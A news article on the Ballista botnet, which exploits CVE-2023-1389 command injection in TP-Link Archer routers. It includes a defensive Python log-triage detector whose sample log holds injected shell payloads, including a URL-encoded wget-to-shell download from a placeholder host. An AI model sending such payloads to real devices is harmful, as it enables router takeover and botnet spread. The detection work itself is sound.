
A model of internet routers marketed to consumers and businesses is being targeted as part of an effort to grow a new botnet known as Ballista.

Researchers at cybersecurity firm Cato Networks said that during a recent investigation into router vulnerabilities, they discovered the botnet infecting TP-Link Archer routers. 

The hacker behind the malware, who they believe is based in Italy, has been exploiting a firmware vulnerability tracked as CVE-2023-1389, an unauthenticated command-injection flaw in the routers' web management interface, to allow the botnet to “spread itself automatically over the Internet” through unpatched TP-Link devices. 

The Cybersecurity and Infrastructure Security Agency previously confirmed that CVE-2023-1389 is being exploited in the wild and, by adding it to its Known Exploited Vulnerabilities catalog in 2023, ordered U.S. civilian agencies to patch the bug. The vulnerability record and the patch both name a single model, the Archer AX21, which TP-Link markets as the AX1800. 

Ofek Vardi, security engineer at Cato Networks, said the researchers are moderately confident the hacker is based in Italy because of the IP address location of the command and control (C2) server and because of Italian-language strings found within the malware’s code.

“We suspect we caught this campaign in its early stages. We saw it evolving, as within a short timeframe, the threat actor changed the initial dropper to allow stealthier connections to the C2 server through the Tor network,” said Matan Mittelman, threat prevention team leader at Cato Networks.

“In this particular campaign, the malware allows the attacker to run arbitrary commands on compromised devices. This suggests the malware author may have bigger plans than a regular DDoS-for-hire botnet.”

Cato’s security team first identified this campaign on January 10 and saw several initial-access attempts over the course of a few weeks, with the most recent coming on February 17. 

Vardi noted that the malware was written in a way that would allow new capabilities to be added to future variants.

The researchers declined to comment on whether Italian or European authorities have been notified of the threat actor or the campaign. 

The researchers said they named the botnet Ballista as a reference to an ancient Roman weapon and said it has targeted manufacturing, healthcare, services and technology organizations in the U.S., Australia, China and Mexico.

A search on the cybersecurity platform Censys found more than 6,000 vulnerable devices exposed to the Internet, they said, adding that the botnet is still active. 

The malware fully takes over a device and reads configuration files on the system before setting up encrypted command-and-control connections and attempting to spread to other devices automatically by exploiting CVE-2023-1389.
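The spreading step described above, and the exploitation of CVE-2023-1389 mentioned earlier, leave a recognisable trace in any web-server or reverse-proxy log sitting in front of an exposed router interface. The following Python is an added example for this article (it is neither Cato's nor TP-Link's code). It relies only on what the public CVE-2023-1389 record states: the `country` field of the locale form's `write` operation on the `/cgi-bin/luci/;stok=/locale` endpoint reaches a shell unsanitised, so a shell metacharacter in that field marks an exploitation attempt. The log-line format, the sample lines and the IP addresses (documentation ranges) are all constructed for the example.

```python
import re
from urllib.parse import unquote, unquote_plus

# Endpoint and parameter named in the public CVE-2023-1389 record for the
# TP-Link Archer AX21: the `country` field of the locale form's `write`
# operation reaches popen() unsanitized, so shell metacharacters in that
# field are the signature of an exploitation attempt.
LOCALE_PATH = "/cgi-bin/luci/;stok=/locale"
SHELL_META = re.compile(r"[;&|`$<>\n]")
COUNTRY_CODE = re.compile(r"^[A-Za-z]{2}$")

# Constructed log format (an assumption for this example, not a real
# TP-Link or proxy format):
#   <timestamp> <src_ip> <METHOD> "<request-target>" "<body-or-empty>"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)" "([^"]*)"$')


def _params(*sources):
    """Parse form-encoded strings; earlier sources win on duplicate keys.

    Splits on '&' only: older urllib.parse.parse_qs versions also split
    on ';', which would hide a ';' used as a command separator.
    """
    merged = {}
    for src in sources:
        for pair in src.split("&"):
            if pair:
                key, _, value = pair.partition("=")
                merged.setdefault(unquote_plus(key), unquote_plus(value))
    return merged


def classify_request(target, body=""):
    """Verdict for one request to the router's web UI.

    'exploit'    - locale write whose `country` carries shell metacharacters
    'suspicious' - locale write whose `country` is not a two-letter code
    'benign'     - anything else
    Parameters are taken from the query string and the body alike, since
    in-the-wild probes have been seen using either.
    """
    path, _, query = target.partition("?")
    if not unquote(path).startswith(LOCALE_PATH):
        return "benign"
    params = _params(query, body)
    if params.get("form") != "country" or params.get("operation") != "write":
        return "benign"
    country = params.get("country", "")
    if SHELL_META.search(country):
        return "exploit"
    if not COUNTRY_CODE.match(country):
        return "suspicious"
    return "benign"


def triage_log(lines):
    """Return (src_ip, verdict, country) for every non-benign request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these
        _ts, src_ip, _method, target, body = m.groups()
        verdict = classify_request(target, body)
        if verdict != "benign":
            query = target.partition("?")[2]
            country = _params(query, body).get("country", "")
            hits.append((src_ip, verdict, country))
    return hits


# Constructed sample traffic (documentation IP ranges, not real observations).
SAMPLE_LOG = [
    '2025-02-17T10:00:01Z 192.0.2.10 GET "/webpages/index.html" ""',
    '2025-02-17T10:00:05Z 192.0.2.10 POST "/cgi-bin/luci/;stok=/locale?form=country" '
    '"operation=write&country=US"',
    '2025-02-17T10:01:02Z 203.0.113.7 GET '
    '"/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>/tmp/o)" ""',
    '2025-02-17T10:01:09Z 203.0.113.7 POST "/cgi-bin/luci/;stok=/locale?form=country" '
    '"operation=write&country=%24%28wget+http%3A%2F%2F198.51.100.5%2Fb+-O-+%7Csh%29"',
    '2025-02-17T10:02:30Z 198.51.100.9 POST "/cgi-bin/luci/;stok=/locale?form=country" '
    '"operation=write&country=ZZZ"',
]

if __name__ == "__main__":
    for src_ip, verdict, country in triage_log(SAMPLE_LOG):
        print(f"{verdict:10s} {src_ip:15s} country={country!r}")
```

Two caveats when using this on real traffic: most perimeter logs record the request line but not POST bodies, so the query-string form of the payload is the one you will usually catch; and a hit is an attempt, not a confirmed compromise. A router whose management interface is reachable from the WAN at all should have that interface closed and its firmware updated regardless of what the log shows.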

Cato Networks found some evidence that the threat actor deploys tools that could be used to steal data from infected networks. The IP address tied to the threat actor is no longer responding, the researchers said, adding that they have found a new variant of the malware on the code repository GitHub. 

“This suggests an increase in the sophistication level of the campaign by the threat actor. While this malware sample shares similarities with other botnets, it remains distinct from widely used botnets such as Mirai and Mozi,” they said. 

Both Vardi and Mittelman said their findings illustrate why Internet of Things (IoT) devices like routers are constantly targeted by malicious hackers. They often have weak passwords and are typically not well-maintained. Most do not have automated security patching, leaving them vulnerable to bugs for months and potentially years.  

“Over the years, major IoT botnets like Mirai and Mozi have proven how easily routers can be exploited and threat actors have taken note,” Mittelman said. “Two key issues have played in their favor: the fact that users rarely deploy new firmware to their routers, coupled with the lack of regard for security by router vendors.”

U.S. officials in recent months have raised alarms about TP-Link routers specifically because they are repeatedly being exploited by Chinese hackers who have used them to breach telecommunications giants and critical infrastructure. 

For years, critical vulnerabilities in TP-Link routers have been abused by hackers who use them as cover for subsequent attacks or add them to powerful botnets that disrupt websites with bogus traffic. 

The Wall Street Journal reported in December that U.S. agencies have considered banning TP-Link devices.
